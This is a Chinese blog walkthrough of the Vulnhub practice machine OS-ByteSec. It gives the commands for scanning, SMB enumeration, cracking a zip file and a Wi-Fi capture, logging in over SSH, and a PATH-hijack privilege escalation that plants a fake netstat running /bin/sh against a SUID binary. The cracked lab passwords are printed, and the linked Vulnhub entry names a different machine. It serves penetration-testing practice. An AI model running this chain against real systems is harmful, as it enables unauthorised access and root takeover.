【Vulnhub】靶机OS-BYTESEC

前言

  • Vulnhub刷题简单记录

OS-BYTESEC

描述

难度:中级

标志:引导根

学习:利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-BYTESEC

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.136.150 -o os-ByteSec

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
6
gobuster dir -u http://192.168.136.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 2
00

dirb http://192.168.1.104/

dirsearch -u 192.168.136.150 -e* -x 403

4、通过smbmap查看共享文件,也可以用 enum4linux来全方面枚举信息

1
2
smbmap -H 192.168.136.150
enum4linux 192.168.136.150

image-20210923113852814

1
2
3
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

5、根据主页的提示smb无密码,所以直接用smbclient登陆

image-20210923120739291

6、接着获取其中的文件

image-20210923121050981

7、破解zip密码hacker1

1
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

image-20210923121831075

1
xdg-open secret.jpg

7、破解包,发现了blackjax的密码为snowflake

1
aircrack-ng -w /usr/share/wordlist/rockyou.txt user.cap

image-20210923122502664

接着ssh登陆,一开始扫出的ssh端口为2525

image-20210923122933073

7、看看能不能suid提权

1
2
3
find / type f -perm -u=s 2>/dev/null

xxd /usr/bin/netscan | less #查看发现其调用netstat -antp 命令

8、利用环境命令的劫持,来让我们提升到root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
blackjax@nitin:/tmp$ echo "/bin/sh" > netstat

blackjax@nitin:/tmp$ chmod 777 netstat

blackjax@nitin:/tmp$ ls
netstat systemd-private-bb2ad2734f824feba859caafc338a835-systemd-timesyncd.service-4xDQxg vmware-root

blackjax@nitin:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

blackjax@nitin:/tmp$ export PATH=/tmp:$PATH

blackjax@nitin:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

blackjax@nitin:/tmp$ netscan

image-20210923124344076

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机OS-BYTESEC

文章作者:孤桜懶契

发布时间:2021年09月23日 - 11:28:48

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/147.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------